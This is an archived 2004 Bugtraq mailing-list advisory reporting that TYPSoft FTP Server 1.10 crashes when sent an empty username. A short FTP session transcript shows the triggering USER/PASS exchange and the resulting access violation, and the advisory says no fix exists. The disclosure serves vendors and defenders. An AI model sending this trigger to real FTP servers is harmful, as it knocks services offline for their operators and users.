Date: Wed, 04 Feb 2004 19:50:22 +0800
From: intuit bug_hunter <intuit@linuxmail org>
To: bugtraq@securityfocus com
Subject: TYPSoft FTP Server 1 10 may be crashed
Application: TYPSoft FTP Server
http://www typsoft com
Version: 1 10
Bug: Denial Of Service
Author: intuit
e-mail: intuit@linuxmail org
web/forum: http://code unixserver at
***********************************************************************
1 Description
2 The bug
3 The code
4 The fix
***********************************************************************
^^^^^^^^^^^^^^^^
1 Description:
^^^^^^^^^^^^^^^^
Vendor's Description:
"TYPSoft FTP Server is a fast and easy ftp server with support to
Standard FTP Command, Clean interface, Virtual File System
architecture, ability to resume Download and Upload, IP Restriction,
Login/Quit message, logs, Multi Language and many other things "
***********************************************************************
^^^^^^^^^^^^^^^^
2 The bug:
^^^^^^^^^^^^^^^^
TYPSoft FTP Server may be crashed with empty USERNAME
***********************************************************************
^^^^^^^^^^^^^^^^
3 The code:
^^^^^^^^^^^^^^^^
To test the vulnerability simply send to the ftp server a empty user name like:
-----------------------------------------------------------------------
220 TYPSoft FTP Server 1 10 ready .
USER
331 Password required for
PASS
501 Access violation at address 77F526AB in module 'ntdll dll'
Write of address 00404C4D
-----------------------------------------------------------------------
and the ftp server may be crashed
Probably 100% employment of computer resources
/*Tested on: Win XP Build 2600, Service Pack: None*/
***********************************************************************
^^^^^^^^^^^^^^^^
4 The fix:
^^^^^^^^^^^^^^^^
Not exist
***********************************************************************
--
______________________________________________
Check out the latest SMS services @ http://www linuxmail org
This allows you to send and receive SMS through your mailbox
Powered by Outblaze
